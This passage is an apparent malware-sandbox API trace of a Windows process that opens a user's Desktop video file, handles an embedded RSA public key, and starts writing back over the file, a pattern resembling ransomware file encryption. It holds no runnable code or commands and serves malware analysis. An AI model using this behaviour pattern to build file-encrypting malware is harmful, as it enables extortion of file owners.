ftLastWriteTime.dwLowDateTime=0x47fb8bc0, ftLastWriteTime.dwHighDateTime=0x1d5e054, nFileSizeHigh=0x0, nFileSizeLow=0x119d8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-ps1uqay2Ko7 CqfFS9C.avi", cAlternateFileName="-PS1UQ~1.AVI")) returned 1 [0203.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0203.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3219e0 [0203.672] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-ps1uqay2Ko7 CqfFS9C.avi") returned=".avi" [0203.672] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-ps1uqay2Ko7 CqfFS9C.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-ps1uqay2ko7 cqffs9c.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0203.672] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=72152) returned 1 [0203.672] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0203.675] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x119b2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.675] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0203.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0203.675] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x119d8, lpOverlapped=0x0) returned 1 [0203.676] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x32eb20 [0203.676] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.676] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.676] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321c00) returned 1 [0203.677] CryptCreateHash (in: hProv=0x321c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0203.677] CryptHashData (hHash=0x32ef238, pbData=0x32eb20, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0203.677] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0203.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0203.677] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0203.677] GetLastError () returned 0x0 [0203.677] SetLastError (dwErrCode=0x0) [0203.677] GetLastError () returned 0x0 [0203.677] SetLastError (dwErrCode=0x0) [0203.677] GetLastError () returned 0x0 [0203.677] SetLastError (dwErrCode=0x0) [0203.677] GetLastError () returned 0x0 [0203.677] SetLastError (dwErrCode=0x0) [0203.677] GetLastError () returned 0x0 [0203.677] SetLastError (dwErrCode=0x0) [0203.677] GetLastError () returned 0x0 [0203.677] SetLastError (dwErrCode=0x0) [0203.677] GetLastError () returned 0x0 [0203.678] SetLastError (dwErrCode=0x0) [0203.678] GetLastError () returned 0x0 [0203.678] SetLastError (dwErrCode=0x0) [0203.678] GetLastError () returned 0x0 [0203.678] SetLastError (dwErrCode=0x0) [0203.678] GetLastError () returned 0x0 [0203.678] SetLastError (dwErrCode=0x0) [0203.678] GetLastError () returned 0x0 [0203.678] SetLastError (dwErrCode=0x0) [0203.678] GetLastError () returned 0x0 [0203.678] SetLastError (dwErrCode=0x0) [0203.678] GetLastError () returned 0x0 [0203.678] SetLastError (dwErrCode=0x0) [0203.678] GetLastError () returned 0x0 [0203.678] SetLastError (dwErrCode=0x0) [0203.678] GetLastError () returned 0x0 [0203.678] SetLastError (dwErrCode=0x0) [0203.678] GetLastError () returned 0x0 [0203.678] SetLastError (dwErrCode=0x0) [0203.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0203.678] GetLastError () returned 0x0 [0203.678] SetLastError (dwErrCode=0x0) [0203.678] GetLastError () returned 0x0 [0203.678] SetLastError (dwErrCode=0x0) [0203.678] GetLastError () returned 0x0 [0203.678] SetLastError (dwErrCode=0x0) [0203.678] GetLastError () returned 0x0 [0203.678] SetLastError (dwErrCode=0x0) [0203.678] GetLastError () returned 0x0 [0203.678] SetLastError (dwErrCode=0x0) [0203.678] GetLastError () returned 0x0 [0203.679] SetLastError (dwErrCode=0x0) [0203.679] GetLastError () returned 0x0 [0203.679] SetLastError (dwErrCode=0x0) [0203.679] GetLastError () returned 0x0 [0203.679] SetLastError (dwErrCode=0x0) [0203.679] GetLastError () returned 0x0 [0203.679] SetLastError (dwErrCode=0x0) [0203.679] GetLastError () returned 0x0 [0203.679] SetLastError (dwErrCode=0x0) [0203.679] GetLastError () returned 0x0 [0203.679] SetLastError (dwErrCode=0x0) [0203.679] GetLastError () returned 0x0 [0203.679] SetLastError (dwErrCode=0x0) [0203.679] GetLastError () returned 0x0 [0203.679] SetLastError (dwErrCode=0x0) [0203.679] GetLastError () returned 0x0 [0203.679] SetLastError (dwErrCode=0x0) [0203.679] GetLastError () returned 0x0 [0203.679] SetLastError (dwErrCode=0x0) [0203.679] GetLastError () returned 0x0 [0203.679] SetLastError (dwErrCode=0x0) [0203.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0203.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0203.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0203.679] CryptDestroyHash (hHash=0x32ef238) returned 1 [0203.679] CryptReleaseContext (hProv=0x321c00, dwFlags=0x0) returned 1 [0203.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0203.679] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0203.679] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0203.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0203.679] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0203.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0203.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0203.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x119e0) returned 0x3b80690 [0203.681] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0203.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0203.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0203.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0203.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0203.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0203.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6dbc8 [0203.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd88 [0203.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6dc10 [0203.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdce0 [0203.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd10 [0203.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd58 [0203.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd28 [0203.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0203.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3294350 [0203.682] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3294350, Size=0x218) returned 0x33109f0 [0203.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b92078 [0203.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd10 | out: hHeap=0x2c0000) returned 1 [0203.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd28 | out: hHeap=0x2c0000) returned 1 [0203.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd58 | out: hHeap=0x2c0000) returned 1 [0203.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0203.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b92078 | out: hHeap=0x2c0000) returned 1 [0203.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd58 [0203.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0203.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fdd28 [0203.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0203.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fdd10 [0203.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0203.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b67078 [0203.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0203.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0203.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0203.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b672a8 [0203.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0203.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0203.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67078 | out: hHeap=0x2c0000) returned 1 [0203.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd28 | out: hHeap=0x2c0000) returned 1 [0203.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0203.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd10 | out: hHeap=0x2c0000) returned 1 [0203.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0203.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0203.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd58 | out: hHeap=0x2c0000) returned 1 [0203.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0203.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0203.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33109f0 | out: hHeap=0x2c0000) returned 1 [0203.682] GetCurrentThreadId () returned 0x600 [0203.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b66078 [0203.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3235e0 [0203.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0203.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0203.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0203.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0203.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0203.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b66390 [0203.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.683] GetCurrentThreadId () returned 0x600 [0203.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0203.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0203.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b66180 [0203.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0203.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3a48 [0203.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0203.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b66498 [0203.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0203.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd58 [0203.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0203.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0203.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0203.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0203.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0203.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0203.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0203.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd10 [0203.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0203.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0203.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0203.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0203.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0203.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0203.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd28 [0203.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0203.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0203.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0203.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdcf8 [0203.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0203.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd70 [0203.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0203.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0203.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd40 [0203.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fddd0 [0203.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0203.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0203.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0203.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0203.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0203.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0203.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd10 | out: hHeap=0x2c0000) returned 1 [0203.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd10 [0203.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0203.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0203.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd58 | out: hHeap=0x2c0000) returned 1 [0203.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b67078 [0203.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fddd0 | out: hHeap=0x2c0000) returned 1 [0203.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x33109f0 [0203.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0203.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b67190 [0203.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0203.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b673c0 [0203.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd10 | out: hHeap=0x2c0000) returned 1 [0203.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3310c08 [0203.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67078 | out: hHeap=0x2c0000) returned 1 [0203.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b66288 [0203.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0203.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0203.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66180 | out: hHeap=0x2c0000) returned 1 [0203.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66288 | out: hHeap=0x2c0000) returned 1 [0203.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0203.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b673c0 | out: hHeap=0x2c0000) returned 1 [0203.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33109f0 | out: hHeap=0x2c0000) returned 1 [0203.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310c08 | out: hHeap=0x2c0000) returned 1 [0203.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67190 | out: hHeap=0x2c0000) returned 1 [0203.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0203.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd40 | out: hHeap=0x2c0000) returned 1 [0203.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0203.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd70 | out: hHeap=0x2c0000) returned 1 [0203.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0203.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd28 | out: hHeap=0x2c0000) returned 1 [0203.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdcf8 | out: hHeap=0x2c0000) returned 1 [0203.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0203.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0203.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66390 | out: hHeap=0x2c0000) returned 1 [0203.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdce0 | out: hHeap=0x2c0000) returned 1 [0203.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6dc10 | out: hHeap=0x2c0000) returned 1 [0203.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0203.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66498 | out: hHeap=0x2c0000) returned 1 [0203.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0203.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b672a8 | out: hHeap=0x2c0000) returned 1 [0203.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0203.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0203.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0203.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0203.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0203.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0203.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0203.686] WriteFile (in: hFile=0x63c, lpBuffer=0x3b80690*, nNumberOfBytesToWrite=0x119d3, 